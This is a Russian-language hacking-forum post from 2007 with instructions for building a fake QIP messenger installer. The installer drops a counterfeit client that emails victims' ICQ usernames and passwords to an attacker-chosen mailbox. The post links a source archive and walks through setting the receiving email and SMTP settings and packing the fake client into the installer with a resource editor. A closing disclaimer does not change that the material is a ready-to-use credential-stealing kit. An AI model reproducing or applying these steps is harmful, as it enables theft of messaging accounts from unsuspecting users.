Тема: Один из методов СИ, описание, применение, нужные исходники
Показать сообщение отдельно

  #5  
Старый 05.03.2007, 02:08
begin_end
Участник форума
Регистрация: 04.01.2007
Сообщений: 176
Провел на форуме:
17964969

Репутация: 1362
По умолчанию
Вот в продолжение к статье и примеру, по просьбам людей, следующее дополнение:


Это инсталлятор QIP, инсталлирующий QIP, который не является настоящим, а всего лишь муляж, отправляющий в ходе "попытки авторизации" имя пользователя и пароль на заданный адрес почты.

Скачать здесь архив с исходниками, готовыми приложениями и инструкцией.


Инструкция по сборке ненастоящего инсталлятора подложного QIP.
В архиве находится:
- в папке QIP_Installer находиться подложный инсталлятор квипа;
- в папке QIP_Pager находиться подложный квип.


Действия по сборке:
1) Если есть полный компилятор Дельфи и возможность самому компилировать и редактор ресурсов ( напр. Restorator);
2) Если еть редактор ресурсов (Restorator, ResHacker) и умение работы с ним.


1. Берём и открываем в Дельфи проект из QIP_Pager. Далее в Unit1.pas, в resourcestring указываем, как там подписано:
-адрес, на который вы хотите принимать данные:
mailadres='???????@tut.by';
-почтовый сервер на который будет производиться отправка:
mailserver='mail.tut.by';
-нужна ли авторизация на том сервере mailserver: false or true:
enableauth='false';
-имя пользователя для авторизации на mailserver:
username='someusername';
-пароль пользователя для авторизации на mailserver:
password='somepassword'.

Компилируем. Потом закрываем проект и открываем проект из QIP_Installer. Там в Unit1.pas пишем номер псевдоверсии квипа:
resourcestring
ver_qip='80хх'; хх-любое актуальное значение, сейчас хх=20.
Компилируем. Закрываем Дельфи. Открываем с помощью Restorator полученный при компиляции файл-экзеху и находим там ресурсную директорию RCData, а в ней ресурс DATA. Берём копируем в проводнике файл подложной экзехи-квипа из QIP_Pager и вставляем в рестораторе в ресурс DATA, и закрываем Restorator с сохранением изменений.


2. Открываем в рестораторе готовую экзеху из папки QIP_Pager и находим в директории ресурсов String ресурс 4075. В нём правим на нужные нам значения, аналогично настройкам почты в (1) следующие строки: 65195 (адрес почты приёма), 65196 (почтовый сервер), 65197 (нужна ли авторизация - true/false), 65198 (имя пользователя для авторизации), 65199 (пароль к имени пользователя для авторизации).

Далее открываем в рестораторе готовую экзеху из QIP_Installer и находим в директории ресурсов String ресурс 4079. В нём указываем номер версии псевдоквипа в строке 65252. Потом находим в этой же проге ресурсную директорию RCData, а в ней ресурс DATA. Берём копируем в проводнике файл подложной экзехи-квипа из QIP_Pager и вставляем в ресурс DATA. Закрываем Restorator с сохранением изменений.


Заключение.
Придумываем подходящее имя инсталлятору. И всё готово.
Следует отметить, что способ этот (в принципе) отправляет данные на почту и не у всех сработает (например, если доступ в Интернет у жертвы осуществляется только через прокси).
Данный способ и продукты были предложены лишь в качестве примера возможной СИ-атаки на ICQ-пользователя QIP и не предназначены для описанных действий, наоборот, автор не одобряет такие действия и за последствия использования этого метода ответственности не несёт.

Авторские права на эту статейку с описанием сборки продукта, а также на сам продукт мои. Автор идеи - MC_Brute.